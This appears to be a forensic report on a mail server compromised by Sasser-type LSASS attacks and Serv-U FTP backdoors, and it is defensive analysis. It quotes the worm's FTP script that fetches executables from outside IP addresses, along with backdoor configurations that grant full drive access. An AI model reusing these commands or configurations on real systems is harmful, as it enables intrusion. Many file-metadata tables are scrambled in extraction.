Microsoft lists the MS04-011 patch as fixing a number of vulnerabilities several of which allow remote code execution and are graded as critical.

Vulnerability Identifiers	Impact of Vulnerability	Windows 2000
LSASS Vulnerability - CAN-2003-0533	Remote Code Execution	Critical
LDAP Vulnerability – CAN-2003-0663	Denial Of Service	Important
PCT Vulnerability - CAN-2003-0719	Remote Code Execution	Critical
Winlogon Vulnerability - CAN-2003-0806	Remote Code Execution	Moderate
Metafile Vulnerability - CAN-2003-0906	Remote Code Execution	Critical
Help and Support Center Vulnerability - CAN-2003-0907	Remote Code Execution	None
Utility Manager Vulnerability - CAN-2003-0908	Privilege Elevation	Important
Windows Management Vulnerability - CAN-2003-0909	Privilege Elevation	None
Local Descriptor Table Vulnerability - CAN-2003-0910	Privilege Elevation	Important
H.323 Vulnerability* - CAN-2004-0117	Remote Code Execution	Important
Virtual DOS Machine Vulnerability - CAN-2004-0118	Privilege Elevation	Important
Negotiate SSP Vulnerability - CAN-2004-0119	Remote Code Execution	Critical
SSL Vulnerability - CAN-2004-0120	Denial Of Service	Important
ASN.1 "Double Free" Vulnerability - CAN-2004-0123	Remote Code Execution	Critical
Aggregate Severity of All Vulnerabilities		Critical

Examination of the C:\WINNT\\$NtUninstallKB835732\$ folder (this is the ms

knowledgebase article number corresponding to MS04-11) indicates that the system was not correctly patched until 20/05/2004.

# **Timeline Analysis**

Seaching the timeline around the 8/05/2004 revealed nothing further unusual on the 8<sup>th</sup>, but several entries on the 7<sup>th</sup> that were interesting:

Name:	winstaterrorlog.dll
File Ext:	dll
File Type:	Dynamic Link Library
File Category:	Code\Library
Signature:	! Bad signature
Description:	File, Archive
Last Accessed:	19/05/04 13:23:14
File Created:	07/05/04 18:03:18
Last Written:	19/05/04 13:23:14
Entry Modified:	20/05/04 11:02:19
Logical Size:	823
Physical Size:	4.096
Starting Extent:	0C-C730848
File Extents:	1
Permissions:	•
Physical Location:	2,993,585,664
Evidence File:	Disk from XXXX01
File Identifier:	2494
Hash Value:	fd048565ad85c8735628ab7b8fcff8bd
Full Path:	Mail Server XXXX01\Disk from XXXX01\C\WINNT\system\winstaterrorlog.dll
Short Name:	WINSTA~1.DLL
File Extents	
Start Sector	Sectors Start Cluster Clusters
5,846,847	8 730,848 1
0,040,041	1 100,040
Permissions	
Name:	Administrators
ld:	S-1-5-32-544
Property:	Allow
Permissions:	[FC] [M] [R&X] [R] [W] [Sync]
ld:	S-1-5-18
Property:	Allow
Permissions:	[FC] [M] [R&X] [R] [W] [Sync]
Name:	
ld:	Users
Property:	Users S-1-5-32-545
	S-1-5-32-545
	S-1-5-32-545 Allow
Permissions:	S-1-5-32-545
Permissions:	S-1-5-32-545 Allow [R&X] [R] [Sync]
Permissions: Name:	S-1-5-32-545 Allow [R&X] [R] [Sync] Administrators
Permissions: Name: Id:	S-1-5-32-545 Allow [R&X] [R] [Sync] Administrators S-1-5-32-544
Permissions: Name:	S-1-5-32-545 Allow [R&X] [R] [Sync] Administrators
Permissions: Name: Id: Property:	S-1-5-32-545 Allow [R&X] [R] [Sync] Administrators S-1-5-32-544 Owner
Permissions: Name: Id: Property: Id:	S-1-5-32-545 Allow [R&X] [R] [Sync] Administrators S-1-5-32-544 Owner S-1-5-18
Permissions: Name: Id: Property:	S-1-5-32-545 Allow [R&X] [R] [Sync] Administrators S-1-5-32-544 Owner

This file had a bad signature indicating that it was probably not a .dll. Examination showed that it was in fact a log file concerning ftp server action. The entry highlighted in blue would seem to indicate some form of conflict with possibly another ftp server.

Thu 13May04 10:14:14 - tcp-ip FTP Server v5.0 (5.0.0.0) - Copyright (c) 1995-2004 Cat Soft, All Rights Reserved - by Rob Beckers

Thu 13May04 10:14:14 - Cat Soft is an affiliate of Rhino Software, Inc.

Thu 13May04 10:14:14 - PROBLEM: Cannot find/load DLL subot.dll (can also happen if the DLL uses other DLLs which are not available)

Thu 13May04 10:14:14 - Using WinSock 2.0 - max. 32767 sockets

Thu 13May04 10:14:15 - PROBLEM: Unable to load the SSL/TLS libraries (SSLEAY32.DLL and LIBEAY32.DLL) - No SSL support

Thu 13May04 10:14:15 - FTP Server listening on port number 2004, IP 10.6.4.119, 10.6.3.19, 127.0.0.1

Thu 13May04 10:14:15 - SERVER IS NOT LISTENING ON IP 127.0.0.1: Port number 43958 already in use!

Thu 13May04 10:14:15 - Valid registration key found

Wed 19May04 13:23:14 - FTP server going down...

Name:	tcp_s	setting.ocx				
File Ext:	OCX					
File Type:	WIN NT Control					
File Category:	Code	Code\Executable				
Signature:	! Bad	signature				
Description:	File, I	Read Only, Archive				
Last Accessed:		6/04 13:23:14				
File Created:	07/05	5/04 17:45:39				
Last Written:		5/04 17:45:39				
Entry Modified:		5/04 11:02:19				
Logical Size:	1,156					
Physical Size:	4,096					
Starting Extent:		, 603154				
File Extents:	1	003134				
	1					
Permissions:	•					
Physical Location:		0,551,040				
Evidence File:		from XXXX01				
File Identifier:	2472	-				
Hash Value:		af5d188c75a5b478f05				
Full Path:			rom XXXX01\C\WINNT\system\tcp_setting.ocx			
Short Name:	TCP_	SE~1.OCX				
File Extents						
Start Sector	Sectors	Start Cluster	Clusters			
4,825,295	8	603,154	1			
,,		, -				
Permissions						
Name:		Administrators				
ld:		S-1-5-32-544				
Property:		Allow				
Permissions:		[FC] [M] [R&X] [R] [W	/I [Sync]			
1 611113310113.						
ld:		S-1-5-18				
		Allow				
Property: Permissions:			/I [Suppl			
Permissions.		[FC] [M] [R&X] [R] [W				
Name:		Users				
ld:		S-1-5-32-545				
Property:		Allow				
Permissions:		[R&X] [R] [Sync]				
Name:		Administrators				
ld:		S-1-5-32-544				
Property:		Owner				
ld:		S-1-5-18				
Property:		Group				

This file also had a bad signature indicating that it was probably not a .ocx. Examination showed that it was in fact a configuration file. Two entries highlighted in blue were thought to warrant further examination.

#### [GLOBAL]

#### Version=5.0.0.0

RegistrationKey=HsVRCjxHMe/HwDOrrUxqeMuChKO0DdlzUy2tCGgcdMVQDs/7P9EdwjKrowsPF//h4YOblvknAH/FHA9

5cfEyb3wzQp2v7UfOzCFEFq722 MaxNrUsers=30 PacketTimeOut=300 DeletePartialUploads=1 ProcessID=1432 [Domain1] LogSystemMes=0 LogSecurityMes=0 LogGETs=0 LogPUTs=0 LogFileSystemMes=0 LogFileSecurityMes=0 LogFileGETs=0 LogFilePUTs=0 ReplyHello=FTP Server Ready :) ReplyNoAnon=Ohne Axx kommst du nicht rein! ReplySYST=UNIX ReplyTooMany=Server ist voll Probiers später nochmal! :) ReplyDown=Server its going down :( ReplyOffline=Server is offline SignOn=c:\program files\windows media player\icons\as.txt (this file does not exist on the system) DirChangeMesFile=c:\program files\windows media player\icons\dirchange.txt User1=myname|1|0 SignOff=c:\program files\windows media player\icons\logout.txt NLSTListDirs=1 URLDecode=1 [DOMAINS] Domain1=0.0.0.0||2004|FTP Server|1|0|0 [EXTERNAL] EventHookDLL1=subot.dll [USER=myname|1] Password=jcD29B555B9BD649B459AA9C2A14DD45BB HomeDir=c:\ AlwaysAllowLogin=1 TimeOut=600 Maintenance=System Access1=f:\|RWAMELCDP Access2=e:\|RWAMELCDP Access3=d:\|RWAMELCDP Access4=c:\|RWAMELCDP

SKEYValues=

These two files do not correspond with the known FTP Server. Searches for ServUDaemon.exe and a time line analysis revealed the following file, which was created at the same time of these two files, and contains the text

# ServUDaemon.exe. The file also does not match the known size for svchost.exe files being considerably larger.

01011001.07		, 201	ng con	0.00.0	lory large			
Name		Log	gical Size	Physi	cal Size	Hash Va	alue	
svchost.exe			697,344		700,416	5734dfd	34e9e13ad1c12076bd4	655023
	dii		823		-			
winstaterrorlog					-		5ad85c8735628ab7b8f	
tcp_setting.ocx	(		1,156		4,096	614eat5	d188c75a5b478f05c49l	o6974b
Name		Las	t Accesse	d F	ile Created		Last Written	Entry Modified
svchost.exe		13	3/05/2004 <sup>-</sup>	10:14	07/05/2004	17:45	07/05/2004 17:48	20/05/2004 11:02
winstaterrorlog	.dll	19	)/05/2004 <sup>·</sup>	13:23	07/05/2004	18:03	19/05/2004 13:23	20/05/2004 11:02
tcp_setting.ocx	(	19	)/05/2004 <sup>·</sup>	13:23	07/05/2004	17:45	07/05/2004 17:45	20/05/2004 11:02
<u></u>								
Name:		sv	chost.exe					
File Ext:		ex						
File Type:			indows Exe	ecutable				
File Category:		Co	de\Execut	able				
Signature:			atch					
Description:			e, Read O		ve			
Last Accessed: File Created:			/05/04 10:					
Last Written:			/05/04 17: /05/04 17:					
Entry Modified:			/05/04 11:					
Logical Size:		69	7,344					
Physical Size:			0,416					
Starting Extent:			C-C610756					
File Extents: Permissions:		12						
Bookmarks:		•						
Physical Locatio	on:		501,688,83	2				
Evidence File:			sk from XX					
File Identifier:		24	758					
Hash Value:					12076bd465			
Full Path:		Ma	ail Server >	(XXX01\[	Disk from XX	XX01\C\	WINNT\system\svchost	.exe
File Extents	-			Ctout Clu	otor	Clust		
Start Sect 4,886,111	or Se 8	ectors		<b>Start Clu</b> 610,756	ister	Cluste 1	ers	
8,244,503	12	8		1,030,55	5	16		
7,810,383	12			976,290		16		
13,417,247				1,677,14	8	17		
6,630,607	12	0		828,818		15		
13,646,67				1,705,82	6	17		
6,626,287	12			828,278	0	15 17		
13,769,095 6,623,967	5 13 12			1,721,129 827,988	9	17		
13,200,91				1,650,10	6	18		
7,800,479	. 11			975,052		14		
13,475,75	1 80	Ċ-		1,684,46	1	10		
Permissions								
Name:			Adminis	trators				
ld:			S-1-5-3					
Property:			Allow					
Permissior	ns:		[FC] [N	1] [R&X] [	R] [W] [Syno	c]		
ld:			S-1-5-1	8				
Property:			Allow	-				
Permission	ns:			1] [R&X] [	R] [W] [Syn	c]		
Name:			Users	0 545				
ld: Property:			S-1-5-3 Allow	2-040				
Permissior	ıs:			R] [Sync	1			
. 5.11.60101			[		1			
Name:			Adminis					
ld:			S-1-5-3	2-544				
Property:			Owner					

ld: S-1-5-18 Property: Group

A further file was discovered that is known to be associated with some Sasser worm variants:

Name: File Ext: Signature: Description: Last Accessed: File Created: Last Written: Entry Modified: Logical Size: Physical Size: Starting Extent: File Extents: Permissions: Physical Location: Evidence File: File Identifier: Hash Value: Full Path: File Extents		k from XXXX01\C\WINNT\system32\cmd.ftp
Start Sector 47,425	Sectors Start Cluster 2 5,920	er Clusters
Permissions Name: Id: Property: Permissions: Id: Property:	Administrators S-1-5-32-544 Allow [FC] [M] [R&X] [R] S-1-5-18 Allow	S?
Permissions: Name: Id: Property: Permissions:	[FC] [M] [R&X] [R] Users S-1-5-32-545 Allow [R&X] [R] [Sync]	[vv] [ƏynC]
Name: ld: Property: ld:	Administrators S-1-5-32-544 Owner S-1-5-18	
Property:	Group	

This file had an unknown signature. Examination showed that it was in fact a batch file for accessing two ftp servers to download files. Of note are the IP addresses of the ftp servers and the files, marked in blue.

open 213.153.172.241 5554 anonymous bin get 12552\_up.exe bye open 213.169.247.143 5554 anonymous bin get 5906\_up.exe bye

Name: File Ext: File Type: File Category: Description: Last Accessed: File Created: Last Written: Entry Modified: Logical Size: Physical Size: Starting Extent: File Extents: Permissions: Physical Location: Evidence File: File Identifier: File Identifier: File Identifier: File Extents Start Sector 48,467	exe Wind Code File, 05/05 05/05 20/05 0 0 0C-C 1 • 24,81 Disk 2413	2_up.exe ows Executable \Executable Archive 5/04 13:53:46 5/04 13:53:46 5/04 13:53:46 5/04 11:05:41 6050,288 15,392 from XXXX01 8 Server XXXX01\Disk from Start Cluster 6,050	XXXX01\C\WINNT Clusters	∩system32\12552_up.exe
Permissions Name: Id: Property: Permissions: Id: Property: Permissions: Name: Id: Property: Permissions: Name: Id: Property: Permissions:		Administrators S-1-5-32-544 Allow [FC] [M] [R&X] [R] [W] [S S-1-5-18 Allow [FC] [M] [R&X] [R] [W] [S Users S-1-5-32-545 Allow [R&X] [R] [Sync] Administrators S-1-5-32-544 Owner S-1-5-18 Group		

This is one of the two files which the program attempted to download from the ftp sites. However the file is of zero bytes indicating that the download possibly did not function correctly. Attempts to connect to both IP addresses failed. These two files are indicative of some versions of the Sasser Worm.

Name	Logical Size Phy	ysical Size	Hash Value	
12552_up.exe		0		
cmd.ftp	131	131	dd4d279484a47f510b61545b54	0f15c2
Name	Last Accessed	File Created	Last Written	Entry Modified
12552_up.exe	05/05/2004 13:53	05/05/2004	13:53 05/05/2004 13:53	20/05/2004 11:05
cmd.ftp	07/05/2004 15:38	05/05/2004	13:53 07/05/2004 15:38	20/05/2004 11:05

Also associated with the Sasser worm is the file dcpromo.log.

File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Entry Modified: Logical Size: Physical Size: Starting Extent: File Extents: Permissions: Physical Location: Evidence File: File Identifier: Hash Value: Full Path: File Extents	27/04/0 07/05/0 20/05/0 104,53 106,49 0C-C10 12 • 6,902,1 Disk fro 24032 ec3890 Mail Se	rchive 14 13:15:06 14 04:23:34 14 13:15:06 14 11:02:17 6 6 6 6 6 6 6 6 585092 169,088 cm XXXX01 2719e86cb5aa11a2d461 erver XXXX01\Disk from	EX1ES02\C\WINNT	\Debug\DCPROMO.LOG
Start Sector	Sectors	Start Cluster	Clusters	
13,480,799	8	1,685,092	1	
13,505,687	8	1,688,203	1 7	
13,454,207 13,438,543	56 8	1,681,768 1,679,810	7 1	
13,285,015	8	1,660,619	1	
13,733,847	8	1,716,723	1	
13,656,839	8	1,707,097	1	
13,239,815	8	1,654,969	1	
13,197,335	16	1,649,659	2	
13,695,911	8	1,711,981	1	
7,857,231	8 64	982,146	1 8	
6,882,151	04	860,261	0	
Permissions				
Name:	A	dministrators		
ld:	S	-1-5-32-544		
Property:		low		
Permissions:	[[	=C] [M] [R&X] [R] [W] [S	Sync]	
ld:	S	-1-5-18		
Property:		low		
Permissions:	[[	=C] [M] [R&X] [R] [W] [S	Sync]	
Name:	L I	sers		
ld:	-	-1-5-32-545		
Property:	-	low		
Permissions:	[[	R&X] [R] [Sync]		
Name:	A	dministrators		
ld:		-1-5-32-544		
Property:		wner		
		7		
ld:		-1-5-18		
Property:	G	roup		

# The file contents indicate that it produced log entries on:

27 Apr 17:17 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability
28 Apr 00:59
28 Apr 12:57
28 Apr 19:54 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability
29 Apr 16:25
29 Apr 23:12
30 Apr 03:03 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability
1 May 19:08
1 May 23:16
1 May 23.53 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability

2 May 19:20 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability
2 May 19:36 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability
3 May 05:43 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability
4 May 01:15

4 May 17:15

5 May 13:56 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 5 May 20:01

6 May 17:21

6 May 20:58 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 08:51 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 09:23 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 10:15 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 10:50 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 11:11 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 11:45 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 11:55 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 12:06 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 12:18 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 12:46 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 13:15 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 15:38 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 7 May 17:45 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 8 May 04:27 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability 8 May 09:06 - Evidence of large string input consistent with Sasser type attack against LSASS vulnerability

Following this information, a search was made of the disk for the following strings associated with Sasser:

#### sasser

aserve.exe aserve2.exe \_up.exe kynetave.exe hkey.exe msiwin84.exe wmiprvsw.exe cmd.ftp Jobaka3 JumpallsNIsTillt SkynetNotice SkynetSasserVrsionWithPingFast Isasss.exe upload.exe win.log

No hits were found for any of these (other than already discussed). It was thought at this stage that, as Norton AntiVirus was running it had prevented the Sasser attacks for being able to complete their infection.

# **Timeline Analysis**

There is a corresponding Sasser type attack (against the LSASS vulnerability) at 13:53 on 5 May with the creation of the cmd.ftp file, and attempt to download the 1252\_up.exe program.

There is a corresponding Sasser type attack (against the LSASS vulnerability) at 15:38 on 7 May with an execution of the cmd.ftp file.

There is a corresponding Sasser type attack (against the LSASS vulnerability) at 17:45 on 7 May with the creation of the creation of the tcp\_setting.ocx file.

There is a corresponding Sasser type attack (against the LSASS vulnerability) at 09:07 on 8 May with the creation of the \temped directory and associated files.

# SECSAS.exe 'Sandbox'

A Windows 2000 Server with Service Pack 4 was created within a VMW are session and a snapshot of the system was taken using Winalysis. The Secsas.exe program was then run, whilst the file system and registry were being monitored by 'filemon' and 'regmon' from

'http://www.sysinternals.com'. These files were run from a Windows Forensic CDROM which had been previously created with a number of tools and was collectively MD5'd as C7131AAE5690BF3E6C69B8D6BAAAD04.

Winalysis and regmon confirmed that sacsas.exe modified the registry key value for:

HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous

To set it to '2'. This has the effect of preventing access to the system without explicit anonymous permissions. No new files were created.

# WX1.exe 'Sandbox'

A Windows 2000 Server with Service Pack 4 was created within a VMW are session and a snapshot of the system was taken using Winalysis. A test directory c:\test was created and the WX1.exe file copied to that directory. The WX1.exe program was then run, whilst the file system and registry were being monitored by 'filemon' and 'regmon' from

'http://www.sysinternals.com'. These files were run from a Windows Forensic CDROM which had been previously created with a number of tools and was collectively MD5'd as C7131AAE5690BF3E6C69B8D6BAAAD04.

Winalysis and filemon confirmed that wx1.exe was the install file for the ServUDaemon program. It created two new files as follows:

C:\test\ServUDaemon.exe 496,836 bytes MD5: 393f38as5dde57bf360a5f015a85a2ea

C:\test\ServUDaemon.ini 1,112 bytes MD5: ab9421dfeaf2285fb602bc4b02b4af9e

Whist the MD5 for ServUDaemon.exe matches that found on the system, the MD5 for ServUDaemon.ini does not. The difference being that the file found on the system contains one additional line: ProcessID=1568. Otherwise the files are the same. No new registry entries were created or values changed.

# ServUDaemon.exe 'Sandbox'

Once WX1 had installed ServUDaemon.exe and ServuDaemon.ini in c:\test, a new snapshot was taken and then ServUDaemon was run. The first thing that was noticeable was that a new file:

C:\test\ServUStartUpLog.txt 531 bytes MD5: a59c810892691c580a32f29640981ba3

Sat 16Oct04 12:08:40 - Serv-U FTP Server v3.0 - Copyright (c) 1995-2001 Cat Soft, All Rights Reserved by Rob Beckers Sat 16Oct04 12:08:40 - Cat Soft is an affiliate of Rhino Software, Inc. Sat 16Oct04 12:08:40 - Using WinSock 2.0 - max. 32767 sockets Sat 16Oct04 12:08:40 - Starting FTP Server... Sat 16Oct04 12:08:41 - FTP Server listening on port number 261, IP 192.168.33.21, 127.0.0.1 Sat 16Oct04 12:08:41 - FTP Server listening on port number 43958, IP 127.0.0.1 Sat 16Oct04 12:08:41 - Valid registration key found

was created in the c:\test directory. The checksum for the ServUDaemon.ini file changed to:

C:\test\ServUDaemon.ini 1,111 bytes MD5: 121021ed715471ecdec8ef8284e44336

The change being traced to one additional line: ProcessID=300.

Checking 'filemon' revealed:

- ServUDaemon.exe first executed:
  - o Wsock32.dll
  - o WS2\_32.DLL
  - WS2HELP.DLL
  - o Winmm.dll
  - o Mmdrv.dll
- It then looked for the following in the parent directory without success:
  - ServUDaemon.ENG
  - ServUDaemon.ENG.DLL

ServUDaemon.EN

- ServUDaemon.EN.DLL
- It then looked for the file BugSlayerUtil.dll in its own parent directory, C:\WINNT\system, C:\WINNT\system32 & C:\WINNT\system32\Wbem all without success.
- Then the program executed:
  - C:\WINNT\system32\INDICDLL.dll

- C:\WINNT\system32\IMM32.dll
- Next, not finding ServUStartUpLog.txt, it created a new file of that name.
- After reading ServUDaemon.ini, it executed:
  - C:\WINNT\system32\msafd.dll &
  - C:\WINNT\system32\wshtcpip.dll
- After again reading ServUDaemon.ini, it executed:
  - C:\WINNT\system32\rnr20.dll &
  - C:\WINNT\system32\DNSAPI.dll
  - C:\WINNT\system32\iphlpapi.dll
  - C:\WINNT\system32\ICMP.dll
  - C:\WINNT\system32\MPRAPI.dll
  - C:\WINNT\system32\SAMLIB.dll
  - o C:\WINNT\system32\NETAPI32.dll
  - o C:\WINNT\system32\SECUT32.dll
  - C:\WINNT\system32\NETRAP.dll
  - o C:\WINNT\system32\ACTIVEDS.dll
  - C:\WINNT\system32\ADSLDPC.dll
  - C:\WINNT\system32\RTUTILS.dll
  - o C:\WINNT\system32\SEPUPAPI.dll
  - o C:\WINNT\system32\USERENV.dll
  - C:\WINNT\system32\RASAPI32.dll
  - C:\WINNT\system32\RASMAN.dll
  - o C:\WINNT\system32\DHCPSVC.dll
  - o C:\WINNT\system32\winrnr.dll
  - C:\WINNT\system32\rasadhlp.dll

Checking 'regmon' revealed:

- ServUDaemon.exe queried nearly all audio drivers on the system (wave, midi, aux, mixer etc)
- It then obtained the systems Winsock2 and TCP parameters
- It obtained the Setup path details
- It then obtained multiple Cryptographic RNG Seed values

Interestingly, running the ServUDaemon.exe program started the ftp server, as you could telnet to it on ports 43958 and 261. The program did not survive

a reboot however and had not been installed as a service as it appeared to have been on the compromised system. A similar test on a sandbox Windows XP SP1 system showed the same behaviour e.g. no ability to survive a reboot and the program not installed as a service. Therefore some other explanation will have to be found for the program found running as a service on the compromised system.

# System Log

We now turn our attention to the 'System Log' service running 'svchs.exe'. The path to the service is listed as:

C:\WINNT\system32\spool\prtprocs\rpc\svchs.exe

Examination of the directory revealed:

Name	Logical Size	Physical Size	Hash Value	
svchs.exe	586,752	589,824	b7498eabf46d9a6a6b4	1cd469be6347c8
tsl.dll	2,173	4,096	2adc29035f6cd95aba2	2a045ebcbf61a9
TzoLibr.dll	36,864	36,864	c39396c57353dd2a37	9d2f5a2cb1435f
Name	Last Accessed	File Created	Last Written	Entry Modified
svchs.exe	20/05/2004 19:10	30/04/2004 03:03	30/04/2004 03:04	20/05/2004 11:05
tsl.dll	21/05/2004 15:07	30/04/2004 03:04	30/04/2004 03:04	20/05/2004 11:05
TzoLibr.dll	20/05/2004 19:10	30/04/2004 03:03	30/04/2004 03:03	20/05/2004 11:05
Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Entry Modified: Logical Size: Physical Size: Starting Extent: File Extents: Permissions: Physical Location: Evidence File: File Identifier: Hash Value: Full Path: File Extents		ble lly, Archive 0:19 3:45 4:26 5:42 2 XX01 d9a6a6b4cd469be63		n32\spool\prtprocs\rpc\svchs.exe
Start Sector	Sectors S	Start Cluster	Clusters	
7,670,991		58,866	1	
13,778,551		,722,311	17	
5,932,863	120 7	41,600	15	
13,639,927		,704,983	18	
7,453,567		031,688	14	
13,424,799		,678,092	19	
6,799,631		349,946	13	
13,510,127		,688,758	19	
8,508,583		,063,565	13	
13,660,183	120 1	,707,515	15	
Permissions				
Name:	Administ	rators		
ld:	S-1-5-32			

	Property: Permissions:		low <sup>-</sup> C] [M] [R&X] [R] [W] [Sy	/nc]	
	ld:	S-	1-5-18		
	Property:		low		
	Permissions:	[F	FC] [M] [R&X] [R] [W] [Sy	/nc]	
	Name:	U	sers		
	ld:		1-5-32-545		
	Property: Permissions:		low R&X] [R] [Sync]		
	r ennissions.	L,			
	Name:		dministrators		
	ld: Property:		·1-5-32-544 wner		
	ld:		1-5-18		
	Property:	-	roup		
Nam	e:	tsl.dll			
File E		dll			
File 7	Type: Category:	Dynam Code\L	ic Link Library		
	ature:		ignature		
	ription:		ead Only, Archive		
	Accessed:		4 15:07:00		
	Created: Written:		)4 03:04:34 )4 03:04:34		
	Modified:		14 03.04.34 04 11:05:42		
	al Size:	2,173			
	ical Size:	4,096			
	ing Extent:	0C-C97	76309		
	Extents: iissions:	1			
	ical Location:	3,998,9	93,920		
	ence File:		om XXXX01		
	dentifier: Value:	24125 20do20	035f6cd95aba2a045ebcb	¥61-0	
Full F				XXX01\C\WINNT\system32\spool\prtprocs\rpc\ts	si dii
	Extents				on an
	<b>Start Sector</b> 7,810,535	Sectors 8	Start Cluster 976,309	Clusters 1	
Perm	nissions				
	Name:	Ad	dministrators		
	ld:		1-5-32-544		
	Property: Permissions:		low FC] [M] [R&X] [R] [W] [Sy	/nc]	
	ld:	S-	1-5-18		
	Property:				
	Permissions:	l.	<sup>-</sup> C] [M] [R&X] [R] [W] [Sy	/nc]	
	Name:		sers		
	ld:		-1-5-32-545 Iow		
	Property: Permissions:		R&X] [R] [Sync]		
	Name:	Δ	dministrators		
	Id:		1-5-32-544		
	Property:		wner		
	ld:	S-	1-5-18		
	Property:		roup		

The bad signature on this file indicates that it is not a .dll, and examination shows it to be a text file:

[GLOBAL] Version=4.0.0.4 LocalSetupPassword=482F561F4402574F0655 OpenFilesUploadMode=Shared

PacketTimeOut=300 RegistrationKey=iOcYblhCq7KULb99DfkUBY2M0/JoXybVtAyGuDv+4OcYbfloyo6VLbQwbIA0Q//tvZkNMRblgzux2w qf69cqCmp0nlSmG4gZb5wlNb+8tsFZbUPt1kzpylqQ74ZsDzYlxJz3Qtl IDOMAINS1 Domain1=0.0.0.0||7777|FTP#1|1 [Domain1] User1=@dmin-Free-FXP12445|1|0 User2=Fr33-FXPers|1|0 MaxNrUsers=20 LogFileSystemMes=0 LogFileSecurityMes=0 LogFileGETs=0 LogFilePUTs=0 ReplyHello=SiGN - FR33-FXP3rs - On Da FUcKiNG C@S£!!! SignOn=c:\WINNT\system32\spool\prtprocs\rpc\system.dll DirChangeMesFile2=c:\WINNT\system32\spool\prtprocs\rpc\system32.dll LogIPNames=1 User3=I33cH-Fr0M|1|0 VirPath1=d:\RECYCLER\S-1-5-21-824908557-1142708513-1380004826-500\.tmp\+002|%HOME%|+-[DRIVE-D]-[USER=@dmin-Free-FXP12445]1] Password=da8ECDA37660A1DFD8A5F445C32FC2F794 HomeDir=c:\ AlwaysAllowLogin=1 Maintenance=System Access1=c:\|RWAMELCDP Access2=d:\RWAMELCDP Access3=e:\|RWAMELCDP Access4=f:\|RWAMELCDP Access5=g:\RWAMELCDP Access6=h:\RWAMELCDP Access7=i:\|RWAMELCDP Access8=k:\|RWAMELCDP Access9=I:\|RWAMELCDP Access10=m:\|RWAMELCDP Access11=n:\\RWAMELCDP Access12=o:\RWAMELCDP Access13=p:\|RWAMELCDP Access14=q:\|RWAMELCDP Access15=r:\|RWAMELCDP Access16=s:\RWAMELCDP Access17=t:\|RWAMELCDP Access18=u:\|RWAMELCDP Access19=v:\|RWAMELCDP Access20=w:\|RWAMELCDP Access21=x:\IRWAMELCDP Access22=y:\|RWAMELCDP Access23=z:\|RWAMELCDP [USER=I33cH-Fr0M|1] Password=fiB45404FFA15E4D6EBB668F1B0602BF3E HomeDir=f:\RECYCLER\S-1-5-21-824908557-1142708513-1380004826-500\.TMP\+001 RelPaths=1 MaxUsersLoginPerIP=1 TimeOut=60 Access1=f:\RECYCLER\S-1-5-21-824908557-1142708513-1380004826-500\.TMP\+001|RLP Access2=d:\RECYCLER\S-1-5-21-824908557-1142708513-1380004826-500\.tmp\+002|RLP [USER=Fr33-FXPers|1] Password=of12E44D304C5289DC889A3584FB281E6F HomeDir=f:\RECYCLER\S-1-5-21-824908557-1142708513-1380004826-500\.TMP\+001 RelPaths=1 AlwaysAllowLogin=1 TimeOut=120 Maintenance=System Access1=f;\RECYCLER\S-1-5-21-824908557-1142708513-1380004826-500\.TMP\+001|RWAMLCDP Access2=d:\RECYCLER\S-1-5-21-824908557-1142708513-1380004826-500\.tmp\+002|RWAMLCDP

Name:TzoLibr.dllFile Ext:dllFile Type:Dynamic Link LibraryFile Category:Code\LibrarySignature:MatchDescription:File, Read Only, Archive

Last Accessed: File Created: Last Written: Entry Modified: Logical Size: Physical Size: Starting Extent: File Extents: Permissions: Physical Location: Evidence File: File Identifier: Hash Value: Full Path: File Extents	30/04 30/04 20/05 36,86 0C-C 2 • 3,682 Disk 2408 c393	34 899101 2,749,952 from XXXX01 4 96c57353dd2a379d2f5a2c		stem32\spool\prtprocs\rpc\TzoLibr.dll
Start Sector 7,192,871	Sectors 8	Start Cluster 899,101	Clusters 1	
13,457,895	64	1,682,229	8	
Permissions Name: Id: Property: Permissions:		Administrators S-1-5-32-544 Allow [FC] [M] [R&X] [R] [W] [S	sync]	
ld: Property: Permissions:		S-1-5-18 Allow [FC] [M] [R&X] [R] [W] [S	ync]	
Name: ld: Property: Permissions:		Users S-1-5-32-545 Allow [R&X] [R] [Sync]		
Name: ld: Property:		Administrators S-1-5-32-544 Owner		
ld: Property:		S-1-5-18 Group		

A web search revealed that this file was thought to be clean, but often associated with Trojans and variants of the ServUDaemon backdoor.

# **Registry Analysis**

Analysis of the "CurrentControl\Services" section of the registry indicates that the svchs services entry was made on 30 Apr at 03:04.

Name:	svchs			
File Type:	20000000	2000000		
Description:	Folder, Re	Folder, Registry Entry		
Last Written:	30/04/04 0	30/04/04 03:04:49		
Logical Size:	5			
Physical Size:	5			
Starting Extent:	0NTRegist	y-C5987,368		
File Extents:	1			
Physical Location:	3,065,712			
Evidence File:	ce File: Disk from XXX01			
Full Path:	Full Path: Mail Server XXXX01\Disk from			
	XXXX01\C rvices\svch	,	nfig\system\NTRegistry\\$\$\$PROTO.HIV\ControlSet001\Se	
File Extents				
Start Sector Sec	tors	Start Cluster	Clusters	
